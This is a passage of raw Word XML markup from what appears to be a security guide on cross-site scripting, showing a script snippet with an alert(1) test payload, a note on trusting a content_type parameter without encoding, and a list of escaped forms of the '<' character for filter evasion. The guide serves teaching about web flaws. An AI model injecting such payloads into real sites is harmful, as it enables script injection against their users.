                              <a:gd name="T47" fmla="*/ 1795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1592">
                                <a:moveTo>
                                  <a:pt x="8679" y="1592"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="1592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="1591"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1571"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="156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1571"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="1591"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="15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Text Box 474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03"/>
                            <a:ext cx="8700" cy="1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sz w:val="15"/>
                                </w:rPr>
                                <w:t>&lt;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script</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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F6EC6"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>var</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:color w:val="3F6EC6"/>
                                  <w:spacing w:val="-13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contentType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2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rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-12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D52929"/>
                                  <w:w w:val="9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;</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-13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alert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Lucida Console"/>
                                  <w:color w:val="D52929"/>
                                  <w:w w:val="9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);</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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F6EC6"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>var</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:color w:val="3F6EC6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title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9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rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-9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w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>"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w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>This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spacing w:val="-9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w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>is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spacing w:val="-9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w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>a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spacing w:val="-9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w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>regular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spacing w:val="-9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1B7D4D"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>title"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;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="57"/>
                                <w:ind w:left="165"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console" w:hAns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 w:hAnsi="Lucida Console"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="93"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>…</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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//some</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Consol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user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agreement</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Consol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and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sending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to</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Consol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server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logic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might</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Consol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be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15"/>
                                </w:rPr>
                                <w:t>here</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45"/>
                                <w:ind w:left="165"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console" w:hAns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 w:hAnsi="Lucida Console"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="93"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>…</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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sz w:val="15"/>
                                </w:rPr>
                                <w:t>&lt;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3" o:spid="_x0000_s1950" style="position:absolute;margin-left:80.7pt;margin-top:10.15pt;width:435pt;height:79.6pt;z-index:-15563264;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,203" coordsize="8700,1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">
                <v:shape id="Freeform 475" o:spid="_x0000_s1951" style="position:absolute;left:1614;top:203;width:8700;height:1592;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,1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WKcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPS2vDMBCE74X+B7GFXEoiO20eOFFCWyi0xziv62Jt&#10;LCfWylhy4v77qlDIcZiZb5jlure1uFLrK8cK0lECgrhwuuJSwW77OZyD8AFZY+2YFPyQh/Xq8WGJ&#10;mXY33tA1D6WIEPYZKjAhNJmUvjBk0Y9cQxy9k2sthijbUuoWbxFuazlOkqm0WHFcMNjQh6HikndW&#10;QX40W7krzl39vk/T5+9+crh0jVKDp/5tASJQH+7h//aXVvA6e4G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WWKcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m8679,1592r-8658,l18,1591,,1571r,-4l,21,21,,8679,r21,21l8700,1571r-18,20l8679,1592xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1795;21,1795;18,1794;0,1774;0,1770;0,224;21,203;8679,203;8700,224;8700,1774;8682,1794;8679,1795" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 474" o:spid="_x0000_s1952" type="#_x0000_t202" style="position:absolute;left:1614;top:203;width:8700;height:15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2HFcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGEbXRVUQsFARpTA89vmaf&#10;yWL2bcxuNf57tyB4HGbmG2ax6mwtLtR641jBcJCAIC6cNlwq+M4/3mYgfEDWWDsmBTfysFr2XhaY&#10;anfljC6HUIoIYZ+igiqEJpXSFxVZ9APXEEfv6FqLIcq2lLrFa4TbWo6SZCItGo4LFTa0qag4Hf6s&#10;gvUPZ1tz3v9+ZcfM5Pl7wrvJSanXfreegwjUhWf40f7UCsbT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YcVxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA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sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;</w:t>
                        </w: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script</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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F6EC6"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>var</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="3F6EC6"/>
                            <w:spacing w:val="-13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contentType</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="-12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D52929"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>1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;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="-13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alert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(</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="D52929"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>1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);</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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F6EC6"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>var</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="3F6EC6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title</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console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1B7D4D"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>This</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D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1B7D4D"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>is</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D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1B7D4D"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>a</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D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1B7D4D"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>regular</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D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1B7D4D"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>title"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;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="57"/>
                          <w:ind w:left="165"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="93"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>…</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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//some</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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user</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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agreement</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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and</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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sending</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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to</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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server</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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logic</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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might</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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be</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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15"/>
                          </w:rPr>
                          <w:t>here</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45"/>
                          <w:ind w:left="165"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="93"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>…</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;</w:t>
                        </w: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/script&gt;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3"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="322"/>
      </w:pP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result,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example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flaw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trusting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content_type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"Share"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>proper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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validation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Pollution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>increase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>impact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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>flaw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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promoting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reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36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XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Sequences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="221" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="276"/>
      </w:pPr>
      <w:r>
        <w:t>All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possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>combinations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character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"\&lt;"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HTML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JavaScript.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Most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won't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>render</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>out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box,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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many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rendered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certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>circumstances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seen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr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5372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151130</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="471" name="Freeform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86 238"/>
                            <a:gd name="T3" fmla="*/ 286 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 286 238"/>
                            <a:gd name="T7" fmla="*/ 286 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 286 238"/>
                            <a:gd name="T11" fmla="*/ 286 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 265 238"/>
                            <a:gd name="T15" fmla="*/ 265 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 259 238"/>
                            <a:gd name="T19" fmla="*/ 259 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 238 238"/>
                            <a:gd name="T23" fmla="*/ 238 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 238 238"/>
                            <a:gd name="T27" fmla="*/ 238 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 262 238"/>
                            <a:gd name="T31" fmla="*/ 262 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 265 238"/>
                            <a:gd name="T35" fmla="*/ 265 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 286 238"/>
                            <a:gd name="T39" fmla="*/ 28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9E0B17" id="Freeform 472" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:11.9pt;width:2.45pt;height:2.45pt;z-index:-15562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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,181610;13335,181610;11430,181610;0,168275;0,164465;13335,151130;17780,151130;31115,166370;31115,168275;17780,18161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5424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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="92710" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="468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710" cy="116205"/>
                          <a:chOff x="1930" y="165"/>
                          <a:chExt cx="146" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="469" name="Picture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0" y="164"/>
                            <a:ext cx="14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0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4"/>
                            <a:ext cx="14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3"/>
                                  <w:sz w:val="15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9" o:spid="_x0000_s1953" style="position:absolute;margin-left:96.5pt;margin-top:8.25pt;width:7.3pt;height:9.15pt;z-index:-15562240;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,165" coordsize="146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">
                <v:shape id="Picture 471" o:spid="_x0000_s1954" type="#_x0000_t75" style="position:absolute;left:1930;top:164;width:146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4PO3HAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxEj09rwkAUxO+C32F5hd5009JKTbMRaRGl&#10;B/Ff0OMj+5oEs2/T7Kqxn94tCD0OM/MbJpl0phZnal1lWcHTMAJBnFtdcaFgt50N3kA4j6yxtkwK&#10;ruRgkvZ7CcbaXnhN540vRICwi1FB6X0TS+nykgy6oW2Ig/dtW4M+yLaQusVLgJtaPkfRSBqsOCyU&#10;2NBHSflxczIKlr9ZdtA/s0/tV9eMzHH+9brdK/X40E3fQXjq/H/43l5oBS+jMfydCUdApj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E4PO3HAAAA3AAAAA8AAAAAAAAAAAAA&#10;AAAAnwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACTAwAAAAA=&#10;">
                  <v:imagedata r:id="rId85" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 470" o:spid="_x0000_s1955" type="#_x0000_t202" style="position:absolute;left:1930;top:164;width:14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aBFs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vFnnB/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toEW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3"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;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5475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374650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="467" name="Freeform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639 590"/>
                            <a:gd name="T3" fmla="*/ 639 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 639 590"/>
                            <a:gd name="T7" fmla="*/ 639 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 638 590"/>
                            <a:gd name="T11" fmla="*/ 638 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 618 590"/>
                            <a:gd name="T15" fmla="*/ 618 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 611 590"/>
                            <a:gd name="T19" fmla="*/ 611 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 590 590"/>
                            <a:gd name="T23" fmla="*/ 590 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 590 590"/>
                            <a:gd name="T27" fmla="*/ 590 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 614 590"/>
                            <a:gd name="T31" fmla="*/ 614 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 618 590"/>
                            <a:gd name="T35" fmla="*/ 618 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 639 590"/>
                            <a:gd name="T39" fmla="*/ 63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3EF6D" id="Freeform 468" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:29.5pt;width:2.45pt;height:2.45pt;z-index:-15561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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,405765;13335,405765;11430,405130;0,392430;0,387985;13335,374650;17780,374650;31115,389890;31115,392430;17780,40576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5526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328295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="200660" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="464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660" cy="116205"/>
                          <a:chOff x="1930" y="517"/>
                          <a:chExt cx="316" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="465" name="Picture 4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0" y="517"/>
                            <a:ext cx="31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6" name="Text Box 46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17"/>
                            <a:ext cx="31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%3C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5" o:spid="_x0000_s1956" style="position:absolute;margin-left:96.5pt;margin-top:25.85pt;width:15.8pt;height:9.15pt;z-index:-15561216;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,517" coordsize="316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">
                <v:shape id="Picture 467" o:spid="_x0000_s1957" type="#_x0000_t75" style="position:absolute;left:1930;top:517;width:316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5a//IAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxEj1trwkAUhN8L/Q/LKfStbirWS5pVRCxU&#10;6YO1gvh2zJ5c2uzZkF01+feuUPBxmJlvmGTWmkqcqXGlZQWvvQgEcWp1ybmC3c/HyxiE88gaK8uk&#10;oCMHs+njQ4Kxthf+pvPW5yJA2MWooPC+jqV0aUEGXc/WxMHLbGPQB9nkUjd4CXBTyX4UDaXBksNC&#10;gTUtCkr/tiej4GvTrrvRMu8m42O23vweeLXa75V6fmrn7yA8tf4e/m9/agWD4RvczoQjIKdX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3+Wv/yAAAANwAAAAPAAAAAAAAAAAA&#10;AAAAAJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAlAMAAAAA&#10;">
                  <v:imagedata r:id="rId87" o:title=""/>
                </v:shape>
